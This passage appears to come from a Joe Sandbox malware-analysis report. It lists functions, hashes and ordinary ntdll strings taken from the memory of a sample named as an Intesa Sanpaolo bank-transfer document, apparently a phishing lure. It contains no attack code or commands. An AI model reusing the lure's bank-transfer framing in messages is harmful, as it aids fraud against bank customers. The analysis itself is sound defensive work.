                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                  • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                  • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                  • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                  Function 01102BA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                  • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                  • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                  • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                  Function 01102BE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                  • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                  • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                  • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                  Function 01102AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                  • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                  • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                  • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                  Function 01102AF0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                  • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                  • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                  • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                  Function 01102D00 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                  • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                  • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                  • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                  Function 01102DB0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                  • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                  • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                  • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                  Function 01102C60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                  • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                  • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                  • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                  Function 01102CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                  • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                  • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                  • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                  Function 01102CF0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                  • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                  • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                  • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                  Function 01102F60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                  • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                  • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                  • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                  Function 01102FA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                  • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                  • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                  • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                  Function 01102E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                  • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                  • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                  • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                  Function 01102EE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                  • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                  • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                  • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                  Function 01103010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                  • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                  • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                  • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                  Function 01103090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                  • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                  • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                  • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                  Function 011035C0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                  • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                  • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                  • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                  Function 011039B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                  • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                  • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                  • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                  Function 01103D10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                  • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                  • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                  • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                  Function 01103D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                  • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                  • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                  • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                  Function 01102C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 01102890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                  • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                  • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                  • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                  Function 01172410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                  • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                  • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                  • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                  Function 010F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                  • Execute=1, xrefs: 01134713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                  • ExecuteOptions, xrefs: 011346A0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                  • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                  • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                  • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                  Function 0110B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                  Function 010EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0113031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                  • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                  • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                  • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                  Function 010FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01137BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                  • RTL: Resource at %p, xrefs: 01137B8E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                  • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                  • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                  • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                  Function 010FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                  • RTL: Re-Waiting, xrefs: 011372C1
                                  • RTL: Resource at %p, xrefs: 011372A3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                  • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                  • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                  • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                  Function 01172300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                  • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                  • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                  • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                  Function 01107D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
